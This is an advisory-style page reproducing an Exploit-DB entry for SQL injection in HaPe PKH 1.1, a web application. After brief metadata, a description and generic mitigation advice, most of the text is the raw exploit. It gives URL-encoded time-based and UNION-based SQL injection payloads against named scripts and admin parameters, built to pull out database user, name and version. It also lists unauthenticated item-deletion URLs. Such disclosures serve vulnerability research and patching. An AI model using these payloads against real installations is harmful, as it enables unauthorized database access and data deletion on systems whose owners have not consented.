HaPe PKH 1.1 - 'id' SQL Injection

vendor:

HaPe PKH

by:

Ihsan Sencan

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: HaPe PKH

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: NO

Related CWE: N/A

CPE: a:sitejo.id:hape_pkh:1.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

HaPe PKH 1.1 – ‘id’ SQL Injection

HaPe PKH 1.1 is vulnerable to SQL injection in the 'id' parameter of the 'lap-anggota-kelompok-pdf.php', 'lap-peserta-perdesa-pdf.php', 'media.php?module=desa&act=hapus&id' and 'media.php?module=pengurus&act=print&id' and 'media.php?module=pengurus&act=editpengurus&id' scripts. An attacker can inject arbitrary SQL commands to gain access to the database and execute malicious code.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Parameterized queries should be used to prevent SQL injection.

Source

Exploit-DB raw data:

# Exploit Title: HaPe PKH 1.1 - 'id' SQL Injection
# Dork: N/A
# Date: 2018-10-12
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.sitejo.id
# Software Link: https://sourceforge.net/projects/hape-pkh/files/latest/download
# Version: 1.1
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# # 1) Everyone
# POST http://localhost/[PATH]/lap-anggota-kelompok-pdf.php HTTP/1.1

nama_kelompok=%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%35%29%29%29%58%29%2d%2d%20%58
 
# 2) Everyone
# POST http://localhost/hape-pkh/lap-peserta-perdesa-pdf.php

desa=%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%35%29%29%29%58%29%2d%2d%20%58

# 3) Everyone
# http://localhost/[PATH]/admin/media.php?module=desa&act=hapus&id=[SQL]

%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%2a%20%46%52%4f%4d%20%28%53%45%4c%45%43%54%28%53%4c%45%45%50%28%35%29%29%29%58%29%2d%2d%20%58

# 4) Users
# http://localhost/[PATH]/admin/media.php?module=pengurus&act=print&id=[SQL]

%2d%77%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2d%2d%20%2d
 
# 5) Users
# http://localhost/[PATH]/admin/media.php?module=pengurus&act=editpengurus&id=[SQL]

&id=%2d%77%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2d%2d%20%2d
 
# 6) Users
# http://localhost/[PATH]/admin/media.php?module=fasilitas&act=editfasilitas&id=[SQL]

%2d%31%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%53%59%53%54%45%4d%5f%55%53%45%52%28%29%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d
 
# 7) Users
# http://localhost/[PATH]/admin/media.php?module=kelompok&act=editkelompok&id=[SQL]

%2d%31%27%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%31%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%33%2c%34%2c%35%2d%2d%20%2d
 
# 8) Everyone
# Delete Item *

http://localhost/[PATH]/admin/modul/mod_pengurus/aksi_pengurus.php?module=pengurus&act=hapus&id=[ID]
http://localhost/[PATH]/admin/modul/mod_update/aksi_update.php?module=update&act=hapus&id=[ID]